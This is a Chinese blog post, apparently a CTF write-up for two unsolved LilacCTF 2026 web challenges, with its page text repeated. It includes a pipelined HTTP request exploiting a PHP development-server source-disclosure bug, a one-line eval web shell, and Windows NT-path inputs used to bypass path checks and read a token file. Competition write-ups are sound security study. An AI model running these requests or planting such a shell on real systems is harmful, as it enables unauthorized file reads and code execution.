博客快捷键

按住 Shift 键查看可用快捷键

ShiftK

开启/关闭快捷键功能

ShiftA

打开/关闭中控台

ShiftD

深色/浅色显示模式

ShiftS

站内搜索

ShiftR

随机访问

ShiftH

返回首页

ShiftL

友链页面

ShiftP

关于本站

ShiftI

原版/本站右键菜单

松开 Shift 键或点击外部区域关闭

文章详情

互动

【CTF】LilacCTF 2026题不解 - Web方向

3042分钟2026-01-2587广东广州

本文详细描述了作者在解决两道题目时遇到的挑战和解决方案。首先，作者利用PHP Development Server <= 7.4.21的远程源代码披露漏洞获取了页面源码，并通过构造特定请求成功获取了源码。接着，作者在源码中找到了一个可传参的eval函数，并尝试通过访问提示的文件s3Cr37_f1L3.php.bak来获取更多信息。在Path Maze挑战中，作者首先访问了/api/info接口，获得了关于挑战的提示和步骤。在第一阶段，作者成功绕过校验获取了Token，但在第二阶段尝试访问备份服务器时遇到了路径验证失败的问题。通过多次尝试不同的路径格式，作者发现使用第二关的接口再次读取Token可以得到不同的结果，但最终认为这个Token并没有太大用处。

尝试两题均未解出，悲

keep

首先利用PHP Development Server <= 7.4.21 - Remote Source Disclosure漏洞获得页面源码，需要构造如下请求：

GET / HTTP/1.1
Host: 61.147.171.35:51585




GET /wwwroot.tgz HTTP/1.1

而后获得源码：

php

HTTP/1.1 200 OK
Host: 61.147.171.35:51585
Date: Sat, 24 Jan 2026 12:35:19 +0000
Connection: close
Content-Length: 92

<?php
@error_reporting(~E_ALL);

echo "Hello World!" . PHP_EOL;

// s3Cr37_f1L3.php.bak

下一步访问提示的文件s3Cr37_f1L3.php.bak，发现有一个可传参的eval：

php

<?php

@eval($_POST["admin"]);

Path Maze

首先访问提示接口/api/info，获得提示：

json

{"data":{"challenge":"Path Maze","hints":["Stage 1: Find and read the access token from the system","Stage 2: Use the token to access the backup server","Token location: C:\\token\\access_key.txt","Backup server: 172.20.0.10","Backup server SMB Share name: backup","Flag file: flag.txt"],"stages":2,"version":"1.0.0"},"success":true}

根据页面的步骤Stage 1: Diagnostic Access，第一步尝试访问access_key.txt，为了绕过校验使用NT路径绕过：

/api/diag/read?path=\\?\C:\token\access_key.txt

成功拿到Token了。此时尝试第二阶段，使用：

\\?\UNC\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: UNC path not allowed","success":false}

使用：

\\?\GLOBALROOT\Device\Mup\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: NT namespace access not allowed","success":false}

使用：

\Device\Mup\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: NT namespace access not allowed","success":false}

然而我们发现使用第二关的接口再次读Token得到不一样的结果：

http://1.95.51.2:8080/api/export/read?path=\\?\C:\token\access_key.txt&token=OKW1RxDBAQ4WF6U6UkTBPepgAkzh06qOuRsfFg_krNw

json

{"content":"ACCESS_KEY:PathMaze2026SecureToken","size":37,"success":true}

应该没啥用...

烧鸡

生活明朗，万物可爱

本文是原创文章，采用 CC BY-NC-SA 4.0 协议，完整转载请注明来自烧鸡

前端7 破解3 比赛5

喜欢这篇文章的人也看了

随便逛逛

【CTF】软件系统安全赛题解

PaletteFlow技术说明文章

隐私政策

评论内容

0/500

昵称

邮箱

网址

滚动到此处加载评论...

安知鱼

来自安知鱼最新设计与科技的文章

查看全部

文章详情

互动

【CTF】LilacCTF 2026题不解 - Web方向

3042分钟2026-01-2587广东广州

尝试两题均未解出，悲

keep

首先利用PHP Development Server <= 7.4.21 - Remote Source Disclosure漏洞获得页面源码，需要构造如下请求：

GET / HTTP/1.1
Host: 61.147.171.35:51585




GET /wwwroot.tgz HTTP/1.1

而后获得源码：

php

HTTP/1.1 200 OK
Host: 61.147.171.35:51585
Date: Sat, 24 Jan 2026 12:35:19 +0000
Connection: close
Content-Length: 92

<?php
@error_reporting(~E_ALL);

echo "Hello World!" . PHP_EOL;

// s3Cr37_f1L3.php.bak

下一步访问提示的文件s3Cr37_f1L3.php.bak，发现有一个可传参的eval：

php

<?php

@eval($_POST["admin"]);

Path Maze

首先访问提示接口/api/info，获得提示：

json

{"data":{"challenge":"Path Maze","hints":["Stage 1: Find and read the access token from the system","Stage 2: Use the token to access the backup server","Token location: C:\\token\\access_key.txt","Backup server: 172.20.0.10","Backup server SMB Share name: backup","Flag file: flag.txt"],"stages":2,"version":"1.0.0"},"success":true}

根据页面的步骤Stage 1: Diagnostic Access，第一步尝试访问access_key.txt，为了绕过校验使用NT路径绕过：

/api/diag/read?path=\\?\C:\token\access_key.txt

成功拿到Token了。此时尝试第二阶段，使用：

\\?\UNC\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: UNC path not allowed","success":false}

使用：

\\?\GLOBALROOT\Device\Mup\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: NT namespace access not allowed","success":false}

使用：

\Device\Mup\172.20.0.10\backup\flag.txt

报错：

json

{"error":"Path validation failed: NT namespace access not allowed","success":false}

然而我们发现使用第二关的接口再次读Token得到不一样的结果：

http://1.95.51.2:8080/api/export/read?path=\\?\C:\token\access_key.txt&token=OKW1RxDBAQ4WF6U6UkTBPepgAkzh06qOuRsfFg_krNw

json

{"content":"ACCESS_KEY:PathMaze2026SecureToken","size":37,"success":true}

应该没啥用...

烧鸡

生活明朗，万物可爱

本文是原创文章，采用 CC BY-NC-SA 4.0 协议，完整转载请注明来自烧鸡

前端7 破解3 比赛5

喜欢这篇文章的人也看了

随便逛逛

【CTF】软件系统安全赛题解

PaletteFlow技术说明文章

隐私政策

评论内容

0/500

昵称

邮箱

网址

滚动到此处加载评论...

安知鱼

来自安知鱼最新设计与科技的文章

查看全部